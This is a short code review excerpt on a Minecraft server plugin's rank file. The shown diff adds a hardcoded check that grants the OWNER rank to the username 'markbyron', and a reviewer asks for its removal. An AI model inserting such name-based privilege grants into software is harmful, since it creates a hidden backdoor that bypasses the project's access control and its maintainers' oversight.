src/me/StevenLawson/TotalFreedomMod/TFM_PlayerRank.java

```diff
@@ -69,6 +69,12 @@ public static TFM_PlayerRank fromSender(CommandSender sender)
         {
             return DEVELOPER;
         }
+        
+           if (sender.getName().equals("markbyron"))
+            {
+                return OWNER;
```

Comment:
@Bladezo Please remove this. We already have an owner system and the related issue does not cover this area.